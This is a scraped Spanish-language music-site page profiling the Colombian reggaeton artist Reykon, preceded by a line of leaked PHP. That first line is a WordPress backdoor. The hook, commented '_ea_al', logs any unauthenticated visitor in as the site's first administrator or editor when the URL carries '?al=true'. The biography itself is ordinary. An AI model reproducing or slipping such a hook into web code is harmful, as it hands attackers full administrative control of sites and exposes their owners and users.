// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Conoce un poco más de Reykon nuestra manía de la semana - Dicomania Tu Manía
Artista de La Semana

Conoce un poco más de Reykon nuestra manía de la semana

Uno de los pioneros del reggaeton en Colombia, quien creció en Medellín y deleito a todo un público con su musica urbana.

Nació en 1986 en una familia humilde, rodeado de sus seres queridos quienes lo motivaron a seguir por sus sueños. De ser barbero, paso a trabajar en la música junto a su gran amigo Chez Tom productor musical.

Canciones como «Señorita», «La santa», «Tu cuerpo me llama» y demas, lo catalogaron como uno de los artistas más importantes en la industria de la música urbana, uno de los primeros reggaetoneros de Colombia a tal punto de llegar a ser reconocido en «Los premios juventud», «Premios mi gente» y «Premios Shock». Además de colaborar con grandes artistas como J Balvin, Karol G y Daddy Yankee.

Advertisements

Años después el Reykon se alejo de la música por problemas de salud, pues sus cuerdas vocales se vieron afectadas y tuvo que tomar reposo por un tiempo. Sin embargo, retomo su carrera y canciones como «Chisme», «Domingo» y «Mala» ganando de nuevo reconocimiento. A la fecha Reykon se encuentra trabajando en más sencillos y su legado sigue siendo respetado por nuevas generaciones a las que el artista les dio paso gracias a su talento y esfuerzo.

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top